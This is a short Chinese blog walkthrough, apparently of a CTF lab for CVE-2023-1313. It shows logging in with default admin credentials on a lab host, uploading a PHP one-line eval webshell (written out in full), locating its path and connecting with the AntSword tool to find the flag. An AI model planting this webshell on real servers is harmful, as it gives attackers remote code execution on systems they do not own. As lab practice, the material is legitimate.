首页 > 其他分享 >CVE-2023-1313

CVE-2023-1313

时间:2024-07-31 22:54:19浏览次数:11  
标签:1313 uid storage http 2023 cloudeci1 CVE 上传 07

开启靶场

url访问/install来运行安装

http://eci-2ze0wqx38em0qticuhug.cloudeci1.ichunqiu.com/install/

得知其用户和密码为admin

登录

查找文件上传位置

上传一句话木马文件

<?php echo phpinfo();@eval($_POST['flw']);?>

下载查看上传木马路径

复制路径

/storage/uploads/2024/07/31/3_uid_66aa253f9a377.php

使用蚁剑连接

连接的就是上面这个url

http://eci-2ze0wqx38em0qticuhug.cloudeci1.ichunqiu.com/storage/uploads/2024/07/31/1_uid_66aa34754ca41.php

查找flag

标签:1313,uid,storage,http,2023,cloudeci1,CVE,上传,07
From: https://blog.csdn.net/a666666688/article/details/140834207

相关文章

  • 【专题】2023年中国数字金融调查报告PDF合集分享(附原数据表)
    原文链接:https://tecdat.cn/?p=34685原文出处:拓端数据部落公众号随着数字化转型的深入推进,新客户的增长速度已达顶峰,用户运营成为推动存量增长的关键手段。调查数据显示,相比去年,网上银行用户比例有所下降,而手机银行用户比例基本持平。阅读原文,获取专题报告合集全文,解锁文末249份......
  • 0CTF/TCTF 2023 OLAPInfra Nashorn RCE + HDFS UDF RCE
    前置知识ClickHouse:是一个开源的列式数据库管理系统clickhouse-jdbc-bridge:clickhouse数据库和jdbc交互的工具HDFS(HadoopDistributedFileSystem):专为大数据存储和处理而设计。审计<?phperror_reporting(E_ALL^E_DEPRECATED);require__DIR__.'/../vendor/autol......
  • 塔子哥的编程乐趣-腾讯2023笔试(codefun2000)
    题目链接塔子哥的编程乐趣-腾讯2023笔试(codefun2000)题目内容塔子哥是一位资深的程序员,他最近在研究一种特殊的数组操作。他有一个由正整数组成的数组,数组的长度是偶数。塔子哥可以对数组中的任意一个数字执行以下两种操作之一:将该数字乘以2;将该数字除以2并向下......
  • 更新至2023年上市公司ESG数据合集(十份数据:华证年度、华证季度、商道融绿、wind、秩鼎
    更新至2023年上市公司ESG数据合集(十份数据:华证年度、华证季度、商道融绿、wind、秩鼎、润灵环球、盟浪、富时罗素、上市银行华证ESG)数据名称:一、2018-2023年上市公司富时罗素ESG评分数据二、2018-2023年上市公司WindESG评级数据三、2014-2023年上市公司盟浪ESG评级数据四......
  • zookeeper未授权访问(CVE-2014-085)
    漏洞描述默认安装配置完的zookeeper允许未授权访问,管理员未配置访问控制列表(ACL)。导致攻击者可以在默认开放的2181端口下通过执行envi命令获得大量敏感信息(系统名称、java环境)导致任意用户可以在网络不受限的情况下进行未授权访问读取数据漏洞影响ApacheZooKeeper漏洞复现Ap......
  • 2023华数杯优秀论文A-数值模拟在隔热结构上的应用
    摘要本文研究了平纹织物整体的热导率和单根A纤维的热导率之间模型,对题目所给的表面温度分布进行插值,对于纤维材料建立了整体分析和微观最小单位分析两种模型,通过建立热传导方程和边界条件并且利用两种模型的参数进行温度分布的计算,使得两种模型下的温度分布最接近则建立......
  • Solution - Atcoder UTPC2023P Priority Queue 3
    考虑找一些关于合法的\(X\)加入的数的判定条件。假设遇到了一个\(\operatorname{pop}\)操作,令这里删除的数为\(a_i\),显然\(X\)中的数应该要有\(a_i\),其次\(X\)中其他的加入的数要么\(>a_i\)要么是\(a\)中的元素(在前面的\(\operatorname{pop}\)就已经被删了)。于......
  • joisc 2023 护照
    joisc2023护照这题题意好难理解。题目链接P9331[JOISC2023Day1]Passport题意描述有\(n\)个点,每个点连边连向编号在\([L_i,R_i]\)间的点,有\(Q\)组询问,每次从\(x\)号点出发,求出到\(1\)号点和到\(n\)号点的两条路径经过点的并集的最小值。\(n,Q\leq2\cdot......
  • CSP2023&NOIP2023游记
    CSP(10.21)早上8:30开考,根据以往的经验,去考场去早了也只能白等着,所以这次差不多8:10才进考场(指的是进学校大门),到的时候发现我们机房的几个同学都先走了。先是普及组,希望拿个400,还是比较有信心的。J组8:30开始考试。先看了一下四道题,前三道都是直接看出了思路,T4感觉有点难度,到时候可......
  • 2023暑假总结2
    暑假总结27.1~7.157月份前半月我们主要是和NOI选手一起打比赛和自己刷题,感谢这次NOI让我真正地体会到了高手的厉害,但也让我觉得NOI其实也不是想象中的那么困难,让我看到了希望。由于之前写过总结,这里就一笔带过了。7.17模拟测试这次模拟测试是和七林一起考的,第一题是一个结......